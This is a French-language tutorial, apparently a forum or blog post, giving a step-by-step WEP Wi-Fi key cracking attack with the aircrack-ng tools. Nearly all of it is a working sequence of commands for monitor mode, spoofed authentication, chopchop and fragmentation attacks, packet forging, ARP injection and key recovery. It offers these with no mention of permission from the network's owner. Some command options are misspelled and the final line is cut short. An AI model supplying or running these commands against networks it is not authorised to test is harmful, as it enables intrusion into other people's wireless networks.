Cracke Wep
Pour pouvoir réussir sans difficultés ce tuto vous devriez quand même avoir la base, c'est à dire arriver à cracker une clé Wep normale.
Savoir si votre carte-wifi supporte l'injection.
Utilisation des commandes : airmon-ng | airodump-ng | aireplay-ng | packetforge-ng | aircrack-ng
--------| TUTO |--------
1) On fait la commande : "airmon-ng" puis "airmon-ng start [INTERFACE]" dans mon cas ce sera :
airmon-ng start wlan0
2) Là on va accélérer un peu car vous devriez savoir les commandes qui suivent :
airodump-ng --encrypt wep mon0 //On précise qu_on veut cibler notre scan sur des réseaux d_enc WEP, et on indique l_interface : mon0 !
On note l_ESSID, le BSSID et le CH ( le nom du réseau, l'adresse mac du celui-ci, et son channel) du réseau choisi
/!\ ATTENTION : Ne pas essayer de séléctionner un réseau trop éloigné, car la connexion peut être facilement perdue. /!\
airodump-ng --wright CrackWifi --channel [channel_du_code_d_en_haut] --bssid [bssid_du_code_d_en_haut] //Le tout sans les [_] bien-sûr...
Explications : --wright va créer un fichier CrackWifi où seront stockées toutes les données sniffées, Et vous gardez cette konsole ouverte, vous en ouvrez une nouvelle et...
Et on va passer à la commande aireplay-ng avec la fonction 1, c'est à dire FakeAuth
aireplay-ng -1 30 -e [ESSID] -a [BSSID] -h 00:12:F0:6F:ED:38 mon0
Explications : -1 correspond à la FakeAuth, 30 c'est l'intervalle en secondes de la réassociation au point d'accès, ESSID c'est le nom du réseau, -a l'adresse BSSID du réseau et -h vous pouvez y mettre n'importe quoi tant que le filtrage mac n'est pas activé, biensûr il faut que cela a à peu près la même forme, du genre XX:XX:XX:XX:XX:XX
Le résultat de la commande devrait se présenter sous cette forme là à peu près :
Sending Authenticating Request (OPEN SYSTEM) [ACK]
Authenticating successfulSending Association Request [ACK]
Association successful :-) (AID: 1)
Sending Keep-Alive packet [ACK]
3) Place au Chopchop
Maintenant, vous devriez voir dans la fenêtre airodump-ng une machine de connecté, avec l'adresse MAC que vous avez saisi un peu plus haut !
Continuons :
aireplay-ng -4 -a BSSID -h 00:12:F0:6F:ED:38 mon0
Explications : -4, correspond à l'attaque chopchop d'aireplay, -a et -h toujours les mêmes comme cité plus haut, et puis l'interface comme d'hab.
Une fois la commande validée, on vous demandera si vous souhaitez utiliser les packets obtenus, appuyez sur Y.
Si la ligne de commande vous retourne le message 'Completed in', cela voudra dire que l'attaque est réussie.(vous devriez avoir le message après ± 20secs à partir de la commande lancée).
Maintenant on va utiliser la commande aireplay-ng, mais cette fois ci avec l'attaque -5 c'est l'attaque par fragmentation, on rentre la même commande sauf en changeant -4 en -5 donc :
aireplay-ng -5 -a BSSID -h 00:12:F0:6F:ED:38 mon0
Pas d'explications cette fois-ci, mais là aussi vous aurez le choix d'utiliser les packets capturées ou pas, donc faites Y.
Quand vous voyez que la ligne de commande vous retourne la ligne "Saving keystream in fragment-xxxx-xxxxxx.xor", et que vous pouvez controler la frappe sur la console, cela veut dire que cette attaque-là est réussie avec succès.
Pour la suite on va utiliser le fichier .xor crée précedemment par la commande aireplay-ng -5...
On tape :
packetforge-ng -0 -a [BSSID] -h 00:12:F0:6F:ED:38 -k [ip_de_destination] -l [ip_source] -y .xor -w arp.cap
Explications : -y correspond à notre fichier .xor juste crée précedemment, et -w veut dire que le packet sera crée, donc arp.cap sera crée.
4) L'injection aireplay !
On y go :
aireplay-ng -3 -e [ESSID] -a [BSSID] -h 00:12:F0:6F:ED:38 -x600 -r arp.cap mon0
Explications : -x600 nombre de packets injectés par seconde, -r on va injecter du contenu dans arp.cam, et toujours l'interface mon0 !
Sur la fenêtre d'airodump-ng vous devez voir les #DATA's augmenter
Ensuite il vous suffit d'attendre un certain temps, le temps d'avoir assez de #DATA's pour pouvoir cracker la clé !
Et le but FINAL :
aircrack-ng CrackWifi.cap
DATA's pour que l'attaque s'achève avec succès !